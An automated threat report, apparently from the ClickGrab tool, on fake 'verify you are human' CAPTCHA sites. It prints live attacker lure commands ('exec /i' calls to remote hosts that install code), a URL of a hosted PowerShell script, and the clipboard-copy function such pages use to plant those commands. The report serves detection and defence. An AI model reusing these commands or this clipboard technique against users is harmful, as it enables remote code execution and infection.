ClickGrab Threat Analysis Report - 2025-12-02
Generated on 2025-12-02 02:30:51
Executive Summary
- Total sites analyzed: 18
- Sites with malicious content: 6
- Unique domains encountered: 20
- Total URLs extracted: 73
- PowerShell download attempts: 1
- Clipboard manipulation instances: 24
Domain Analysis
Most Frequently Encountered Domains
- www.webgo.de: 10 occurrences
- www.google.com: 9 occurrences
- godprox.cc: 8 occurrences
- svetvip.ru: 8 occurrences
- api.whatsapp.com: 6 occurrences
- t.me: 4 occurrences
- mc.yandex.ru: 4 occurrences
- use.fontawesome.com: 3 occurrences
- vk.com: 2 occurrences
- www.facebook.com: 2 occurrences
- ok.ru: 2 occurrences
- twitter.com: 2 occurrences
- www.instagram.com: 2 occurrences
- www.houzz.ru: 2 occurrences
- i.postimg.cc: 2 occurrences
URL Pattern Analysis
reCAPTCHA imagery
3 occurrences across 1 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(3 times)
Font resources
3 occurrences across 1 distinct URLs
https://use.fontawesome.com/releases/v5.0.0/css/all.css(3 times)
CDN hosted scripts
1 occurrences across 1 distinct URLs
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1(1 times)
Google resources
9 occurrences across 4 distinct URLs
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png(3 times)https://www.google.com/intl/en/policies/privacy/(2 times)https://www.google.com/intl/en/policies/terms/(2 times)https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent(2 times)
Suspicious Keyword Analysis
Total Keywords Found: 80 (28 unique)
Keyword Categories
Social Engineering
19 unique keywords
Verification HashRobotCAPTCHA Verificationexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";Verify you are humanverification_idexec /i https://configservermu.net/cioudfiare/chaiienge/iamhumanverification/ID5372728i5/";robotTo better prove you are not a robotChecking if you are human- ...and 9 more
System Commands
3 unique keywords
const command =exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)exec(
Verification Text
3 unique keywords
Hiddenray idhidden
Technical Terms
3 unique keywords
mshtaRay IDiex
Most Frequent Keywords
- robot: 7 occurrences
- hidden: 7 occurrences
- CAPTCHA Verification: 5 occurrences
- I am not a robot: 5 occurrences
- Robot: 5 occurrences
- Verification: 5 occurrences
- verification-id: 5 occurrences
- verification: 4 occurrences
- To better prove you are not a robot: 4 occurrences
- Verification ID: 4 occurrences
- verification_id: 3 occurrences
- iex: 2 occurrences
- exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.rv:([0-9]+[.0-9])");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator): 2 occurrences
- exec(: 2 occurrences
- verification id: 2 occurrences
Similar Keyword Patterns
Groups of keywords that appear to be variations of the same theme:
Group 1: CAPTCHA Verification, Verification, verification
Group 2: Verification Hash, verification-id, verification_id, Verification ID, verification id
Group 3: Robot, robot
Group 4: Hidden, hidden
Group 5: Verify You Are Human, Checking if you are human, Verify you are human
JavaScript Obfuscation Analysis
Obfuscation Sophistication Score: 0/7
Potential Base64 Encoded Content
These strings may contain encoded malicious payloads:
com/i23/cioudfiare/verify/humanverfification/cioud...net/cioudfiare/chaiienge/iamhumanverification/ID53.../bitrix/tools/captcha0b2468297fcaed753af97cbd30264b47com/recaptcha/about/images/reCAPTCHA
Clipboard Manipulation Analysis
Detected clipboard manipulation in 24 instances.
Document.Execcommand Copy
Found in 15 snippets (62.5% of clipboard code)
Examples:
try { document.execCommand('copy')
document.execCommand("copy")
Textarea Manipulation
Found in 15 snippets (62.5% of clipboard code)
Examples:
ng is the safe placeholder above const textarea = document.createElement('textarea'
ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
Complete Malicious Functions
Function 1:
function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }
Report truncated for web display. Full data available in JSON.